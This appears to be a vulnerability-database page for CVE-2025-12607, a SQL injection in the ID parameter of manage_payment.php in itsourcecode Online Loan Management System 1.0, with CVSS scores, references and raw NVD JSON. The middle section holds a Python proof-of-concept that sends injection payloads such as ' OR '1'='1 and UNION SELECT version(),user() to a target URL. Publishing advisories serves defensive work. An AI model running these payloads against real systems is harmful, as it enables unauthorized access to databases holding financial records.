CVE-2025-12607

Description

A vulnerability was identified in itsourcecode Online Loan Management System 1.0. Impacted is an unknown function of the file /manage_payment.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:online_loan_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Online Loan Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12607 SQL Injection PoC
# Target: itsourcecode Online Loan Management System 1.0
# File: /manage_payment.php
# Parameter: ID

def exploit(target_url, payload):
    """
    Exploit SQL injection in manage_payment.php
    """
    # Try to inject SQL payload via ID parameter
    # Basic test payload to confirm vulnerability
    test_payloads = [
        "' OR '1'='1",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
        "' UNION SELECT version(),user()--"
    ]
    
    for payload in test_payloads:
        try:
            # Method 1: GET request with ID parameter
            params = {'id': payload}
            response = requests.get(f'{target_url}/manage_payment.php', params=params, timeout=10)
            
            # Check for SQL error messages or successful injection
            if 'sql' in response.text.lower() or 'error' in response.text.lower():
                print(f'[+] Potential SQL injection detected with payload: {payload}')
                return True
                
            # Method 2: POST request
            data = {'id': payload}
            response = requests.post(f'{target_url}/manage_payment.php', data=data, timeout=10)
            
            if 'sql' in response.text.lower() or 'error' in response.text.lower():
                print(f'[+] Potential SQL injection detected with payload: {payload}')
                return True
                
        except requests.exceptions.RequestException as e:
            print(f'[-] Request failed: {e}')
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-12607.py <target_url>')
        print('Example: python cve-2025-12607.py http://target.com')
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    print(f'[*] Testing CVE-2025-12607 on {target}')
    exploit(target, '')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12607/
[4] VulDB https://vuldb.com/cve/CVE-2025-12607
[5] https://github.com/cintahue/CVE/issues/4
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.330897
[8] https://vuldb.com/?id.330897
[9] https://vuldb.com/?submit.678243
[10] https://github.com/cintahue/CVE/issues/4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12607", "sourceIdentifier": "[email protected]", "published": "2025-11-03T01:15:42.193", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in itsourcecode Online Loan Management System 1.0. Impacted is an unknown function of the file /manage_payment.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:online_loan_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E9FED56B-4CFE-4A49-88D0-68A047A875C4"}]}]}], "references": [{"url": "https://github.com/cintahue/CVE/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.330897", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330897", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678243", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/cintahue/CVE/issues/4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}